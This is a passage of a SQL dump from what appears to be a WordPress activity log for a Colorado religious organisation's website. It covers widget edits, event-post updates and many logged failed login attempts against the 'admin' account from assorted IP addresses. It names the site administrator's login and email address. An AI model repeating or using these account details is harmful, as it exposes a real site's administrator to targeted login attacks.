18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238668,40546,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px,\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238665,40546,'widget_id_base','custom_html'),(238666,40546,'widget_name_translated','Custom HTML'),(238667,40546,'sidebar_id','null'),(238663,40545,'_server_remote_addr','76.130.120.x'),(238664,40545,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238662,40545,'_user_email','nada@zipnadanot.org'),(238659,40545,'_message_key','widget_edited'),(238660,40545,'_user_id','2'),(238661,40545,'_user_login','S8zhaBda'),(238658,40545,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px,\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238657,40545,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238656,40545,'sidebar_id','null'),(238655,40545,'widget_name_translated','Custom HTML'),(238654,40545,'widget_id_base','custom_html'),(238653,40544,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238652,40544,'_server_remote_addr','76.130.120.x'),(238650,40544,'_user_login','S8zhaBda'),(238651,40544,'_user_email','nada@zipnadanot.org'),(238649,40544,'_user_id','2'),(238648,40544,'_message_key','widget_edited'),(238647,40544,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, \\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238645,40544,'sidebar_id','null'),(238646,40544,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238644,40544,'widget_name_translated','Custom HTML'),(238643,40544,'widget_id_base','custom_html'),(238640,40543,'_user_email','nada@zipnadanot.org'),(238641,40543,'_server_remote_addr','76.130.120.x'),(238642,40543,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238639,40543,'_user_login','S8zhaBda'),(238638,40543,'_user_id','2'),(238637,40543,'_message_key','widget_edited'),(238636,40543,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238615,40541,'_message_key','widget_edited'),(238616,40541,'_user_id','2'),(238617,40541,'_user_login','S8zhaBda'),(238618,40541,'_user_email','nada@zipnadanot.org'),(238619,40541,'_server_remote_addr','76.130.120.x'),(238620,40541,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238621,40542,'widget_id_base','custom_html'),(238622,40542,'widget_name_translated','Custom HTML'),(238623,40542,'sidebar_id','null'),(238624,40542,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238625,40542,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238626,40542,'_message_key','widget_edited'),(238627,40542,'_user_id','2'),(238628,40542,'_user_login','S8zhaBda'),(238629,40542,'_user_email','nada@zipnadanot.org'),(238630,40542,'_server_remote_addr','76.130.120.x'),(238631,40542,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238632,40543,'widget_id_base','custom_html'),(238633,40543,'widget_name_translated','Custom HTML'),(238634,40543,'sidebar_id','null'),(238635,40543,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(240032,40857,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(240031,40857,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 20pt;\">Ready For Some Spiritual Conversation?</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Spiritual discussions are forums that dive deep into spiritual topics. You’ll be able to share your spiritual experiences, perspectives, or questions. If you prefer to listen and learn, that’s cool too!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">People of all faiths and backgrounds are welcome. There’s no need to register—just drop in.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Explore this spiritual topic with other participants in a lively discussion led by an ECK Spiritual Aide (ESA), a specially trained member of the ECK clergy.<br>\n</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Preceded by a HU Chant from 9:45 - 10:15 a.m.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(240014,40856,'post_id','269323'),(240015,40856,'post_type','mec-events'),(240016,40856,'post_title','The Spiritual Laws of Life'),(240017,40856,'post_new_thumb_id','265138'),(240018,40856,'post_new_thumb_title','rountable-notext-2021'),(240019,40856,'post_meta_added','77'),(240020,40856,'_message_key','post_updated'),(240021,40856,'_user_id','2'),(240022,40856,'_user_login','S8zhaBda'),(240023,40856,'_user_email','nada@zipnadanot.org'),(240024,40856,'_server_remote_addr','76.130.120.x'),(240025,40856,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269323'),(240026,40857,'post_id','269323'),(240027,40857,'post_type','mec-events'),(240028,40857,'post_title','The Spiritual Laws of Life'),(240029,40857,'post_prev_post_name',''),(240030,40857,'post_new_post_name','the-spiritual-laws-of-life'),(240004,40855,'new_post_title','ROUNDTABLE TEMPLATE - We don\'t use that term \"Roundtable\" anymore - it\'s a Spiritual Discussion | Title Goes Here'),(240005,40855,'new_post_id','269323'),(240006,40855,'duplicated_post_title','ROUNDTABLE TEMPLATE - We don\'t use that term \"Roundtable\" anymore - it\'s a Spiritual Discussion | Title Goes Here'),(240007,40855,'duplicated_post_id','266311'),(240008,40855,'_message_key','post_duplicated'),(240009,40855,'_user_id','2'),(240010,40855,'_user_login','S8zhaBda'),(240011,40855,'_user_email','nada@zipnadanot.org'),(240012,40855,'_server_remote_addr','76.130.120.x'),(240013,40855,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=5d72e67929&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240003,40854,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=5d72e67929&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240001,40854,'_user_email','nada@zipnadanot.org'),(240002,40854,'_server_remote_addr','76.130.120.x'),(240000,40854,'_user_login','S8zhaBda'),(239999,40854,'_user_id','2'),(239998,40854,'_message_key','post_updated'),(239997,40854,'post_title','ROUNDTABLE TEMPLATE &#8211; We don&#8217;t use that term &#8220;Roundtable&#8221; anymore &#8211; it&#8217;s a Spiritual Discussion | Title Goes Here'),(239995,40854,'post_id','269323'),(239996,40854,'post_type','mec-events'),(239994,40853,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(239993,40853,'_server_remote_addr','76.130.120.x'),(239992,40853,'_message_key','user_logged_in'),(239991,40853,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(239989,40853,'_user_login','S8zhaBda'),(239990,40853,'_user_email','nada@zipnadanot.org'),(239988,40853,'_user_id','2'),(239987,40853,'user_login','S8zhaBda'),(239985,40853,'user_id','2'),(239986,40853,'user_email','nada@zipnadanot.org'),(239984,40852,'_server_remote_addr','173.231.231.x'),(239983,40852,'_message_key','plugin_update_available'),(239982,40852,'plugin_new_version','1.2.1'),(239981,40852,'plugin_current_version','1.2.0'),(239980,40852,'plugin_name','WP Fastest Cache'),(239978,40851,'_message_key','user_unknown_login_failed'),(239979,40851,'_server_remote_addr','205.185.122.x'),(239977,40851,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(239975,40850,'_server_remote_addr','141.94.247.x'),(239976,40851,'failed_username','admin'),(239974,40850,'_message_key','user_unknown_login_failed'),(239973,40850,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(239972,40850,'failed_username','admin'),(239971,40849,'_server_http_referer','https://fureverheaven.org/wp-login.php'),(239970,40849,'_server_remote_addr','197.48.36.x'),(239969,40849,'_message_key','user_unknown_login_failed'),(239968,40849,'server_http_user_agent','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),(239967,40849,'failed_username','admin'),(239966,40848,'_server_remote_addr','13.79.17.x'),(239965,40848,'_message_key','user_unknown_login_failed'),(239963,40848,'failed_username','admin'),(239964,40848,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(239962,40847,'_server_remote_addr','45.61.186.x'),(239961,40847,'_message_key','user_unknown_login_failed'),(239960,40847,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10'),(239959,40847,'failed_username','admin'),(239957,40846,'_message_key','user_unknown_login_failed'),(239958,40846,'_server_remote_addr','198.98.61.x'),(239956,40846,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(239954,40845,'_server_remote_addr','125.212.209.x'),(239955,40846,'failed_username','administrator'),(239953,40845,'_message_key','user_unknown_login_failed'),(239930,40840,'server_http_user_agent','Mozilla/5.0'),(239931,40840,'_message_key','user_unknown_login_failed'),(239932,40840,'_server_remote_addr','20.38.46.x'),(239933,40841,'failed_username','admin'),(239934,40841,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(239935,40841,'_message_key','user_unknown_login_failed'),(239936,40841,'_server_remote_addr','91.238.164.x'),(239937,40842,'failed_username','admin'),(239938,40842,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(239939,40842,'_message_key','user_unknown_login_failed'),(239940,40842,'_server_remote_addr','45.61.188.x'),(239941,40843,'failed_username','administrator'),(239942,40843,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(239943,40843,'_message_key','user_unknown_login_failed'),(239944,40843,'_server_remote_addr','107.189.30.x'),(239945,40844,'post_id','269322'),(239946,40844,'post_type','nf_sub'),(239947,40844,'post_title',''),(239948,40844,'_message_key','post_updated'),(239949,40844,'_server_remote_addr','63.236.112.x'),(239950,40844,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(239951,40845,'failed_username','admin'),(239952,40845,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(239902,40833,'_server_remote_addr','20.38.46.x'),(239903,40834,'failed_username','admin'),(239904,40834,'server_http_user_agent','Mozilla/5.0'),(239905,40834,'_message_key','user_unknown_login_failed'),(239906,40834,'_server_remote_addr','20.38.46.x'),(239907,40835,'failed_username','admin'),(239908,40835,'server_http_user_agent','Mozilla/5.0'),(239909,40835,'_message_key','user_unknown_login_failed'),(239910,40835,'_server_remote_addr','20.38.46.x'),(239911,40836,'failed_username','admin'),(239912,40836,'server_http_user_agent','Mozilla/5.0'),(239913,40836,'_message_key','user_unknown_login_failed'),(239914,40836,'_server_remote_addr','20.38.46.x'),(239915,40837,'post_id','269321'),(239916,40837,'post_type','nf_sub'),(239917,40837,'post_title',''),(239918,40837,'_message_key','post_updated'),(239919,40837,'_server_remote_addr','104.28.50.x'),(239920,40837,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(239921,40838,'failed_username','admin'),(239922,40838,'server_http_user_agent','Mozilla/5.0'),(239923,40838,'_message_key','user_unknown_login_failed'),(239924,40838,'_server_remote_addr','20.38.46.x'),(239925,40839,'failed_username','admin'),(239926,40839,'server_http_user_agent','Mozilla/5.0'),(239927,40839,'_message_key','user_unknown_login_failed'),(239928,40839,'_server_remote_addr','20.38.46.x'),(239929,40840,'failed_username','admin'),(239901,40833,'_message_key','user_unknown_login_failed'),(239900,40833,'server_http_user_agent','Mozilla/5.0'),(239899,40833,'failed_username','admin'),(239898,40832,'_server_remote_addr','20.38.46.x'),(239897,40832,'_message_key','user_unknown_login_failed'),(239896,40832,'server_http_user_agent','Mozilla/5.0'),(239895,40832,'failed_username','admin'),(239893,40831,'_message_key','user_unknown_login_failed'),(239894,40831,'_server_remote_addr','20.38.46.x'),(239891,40831,'failed_username','admin'),(239892,40831,'server_http_user_agent','Mozilla/5.0'),(239889,40830,'_message_key','user_unknown_login_failed'),(239890,40830,'_server_remote_addr','20.38.46.x'),(239888,40830,'server_http_user_agent','Mozilla/5.0'),(239887,40830,'failed_username','admin'),(239886,40829,'_server_remote_addr','173.231.231.x'),(239885,40829,'_message_key','plugin_update_available'),(239883,40829,'plugin_current_version','20230721'),(239884,40829,'plugin_new_version','20231101'),(239876,40827,'_server_remote_addr','76.130.120.x'),(239877,40827,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(239875,40827,'_message_key','user_logged_in'),(238754,40556,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(238755,40556,'_message_key','user_unknown_login_failed'),(238756,40556,'_xmlrpc_request','true'),(238757,40556,'_server_remote_addr','81.161.229.x'),(238758,40557,'failed_username','admin'),(238759,40557,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(238760,40557,'_message_key','user_unknown_login_failed'),(238761,40557,'_xmlrpc_request','true'),(238762,40557,'_server_remote_addr','81.161.229.x'),(238763,40558,'failed_username','admin'),(238764,40558,'server_http_user_agent','Mozilla/5.0'),(238765,40558,'_message_key','user_unknown_login_failed'),(238766,40558,'_server_remote_addr','52.232.6.x'),(238767,40559,'failed_username','admin'),(238768,40559,'server_http_user_agent','Mozilla/5.0'),(238769,40559,'_message_key','user_unknown_login_failed'),(238770,40559,'_server_remote_addr','52.232.6.x'),(238771,40560,'failed_username','admin'),(238772,40560,'server_http_user_agent','Mozilla/5.0'),(238773,40560,'_message_key','user_unknown_login_failed'),(238774,40560,'_server_remote_addr','52.232.6.x'),(238775,40561,'failed_username','admin'),(238776,40561,'server_http_user_agent','Mozilla/5.0'),(238777,40561,'_message_key','user_unknown_login_failed'),(238778,40561,'_server_remote_addr','52.232.6.x'),(238779,40562,'failed_username','admin'),(238780,40562,'server_http_user_agent','Mozilla/5.0'),(238781,40562,'_message_key','user_unknown_login_failed'),(238782,40562,'_server_remote_addr','52.232.6.x'),(238783,40563,'failed_username','admin'),(238784,40563,'server_http_user_agent','Mozilla/5.0'),(238785,40563,'_message_key','user_unknown_login_failed'),(238786,40563,'_server_remote_addr','52.232.6.x'),(238787,40564,'failed_username','admin'),(238788,40564,'server_http_user_agent','Mozilla/5.0'),(238789,40564,'_message_key','user_unknown_login_failed'),(238790,40564,'_server_remote_addr','52.232.6.x'),(238791,40565,'failed_username','admin'),(238792,40565,'server_http_user_agent','Mozilla/5.0'),(238793,40565,'_message_key','user_unknown_login_failed'),(238794,40565,'_server_remote_addr','52.232.6.x'),(238795,40566,'failed_username','admin'),(238796,40566,'server_http_user_agent','Mozilla/5.0'),(238797,40566,'_message_key','user_unknown_login_failed'),(238798,40566,'_server_remote_addr','52.232.6.x'),(238799,40567,'failed_username','admin'),(238800,40567,'server_http_user_agent','Mozilla/5.0'),(238801,40567,'_message_key','user_unknown_login_failed'),(238802,40567,'_server_remote_addr','52.232.6.x'),(238803,40568,'failed_username','admin'),(238804,40568,'server_http_user_agent','Mozilla/5.0'),(238805,40568,'_message_key','user_unknown_login_failed'),(238806,40568,'_server_remote_addr','52.232.6.x'),(238807,40569,'failed_username','admin'),(238808,40569,'server_http_user_agent','Mozilla/5.0'),(238809,40569,'_message_key','user_unknown_login_failed'),(238810,40569,'_server_remote_addr','52.232.6.x'),(238811,40570,'failed_username','admin'),(238812,40570,'server_http_user_agent','Mozilla/5.0'),(238813,40570,'_message_key','user_unknown_login_failed'),(238814,40570,'_server_remote_addr','52.232.6.x'),(238815,40571,'failed_username','admin'),(238816,40571,'server_http_user_agent','Mozilla/5.0'),(238817,40571,'_message_key','user_unknown_login_failed'),(238818,40571,'_server_remote_addr','52.232.6.x'),(238819,40572,'failed_username','admin'),(238820,40572,'server_http_user_agent','Mozilla/5.0'),(238821,40572,'_message_key','user_unknown_login_failed'),(238822,40572,'_server_remote_addr','52.232.6.x'),(238823,40573,'failed_username','admin'),(238824,40573,'server_http_user_agent','Mozilla/5.0'),(238825,40573,'_message_key','user_unknown_login_failed'),(238826,40573,'_server_remote_addr','20.38.46.x'),(238827,40574,'failed_username','admin'),(238828,40574,'server_http_user_agent','Mozilla/5.0'),(238829,40574,'_message_key','user_unknown_login_failed'),(238830,40574,'_server_remote_addr','52.232.6.x'),(238831,40575,'failed_username','admin'),(238832,40575,'server_http_user_agent','Mozilla/5.0'),(238833,40575,'_message_key','user_unknown_login_failed'),(238834,40575,'_server_remote_addr','20.38.46.x'),(238835,40576,'failed_username','admin'),(238836,40576,'server_http_user_agent','Mozilla/5.0'),(238837,40576,'_message_key','user_unknown_login_failed'),(238838,40576,'_server_remote_addr','52.232.6.x'),(238839,40577,'failed_username','admin'),(238840,40577,'server_http_user_agent','Mozilla/5.0'),(238841,40577,'_message_key','user_unknown_login_failed'),(238842,40577,'_server_remote_addr','20.38.46.x'),(238843,40578,'failed_username','admin'),(238844,40578,'server_http_user_agent','Mozilla/5.0'),(238845,40578,'_message_key','user_unknown_login_failed'),(238846,40578,'_server_remote_addr','52.232.6.x'),(238847,40579,'failed_username','admin'),(238848,40579,'server_http_user_agent','Mozilla/5.0'),(238849,40579,'_message_key','user_unknown_login_failed'),(238850,40579,'_server_remote_addr','20.38.46.x'),(238851,40580,'failed_username','admin'),(238852,40580,'server_http_user_agent','Mozilla/5.0'),(238853,40580,'_message_key','user_unknown_login_failed'),(238854,40580,'_server_remote_addr','52.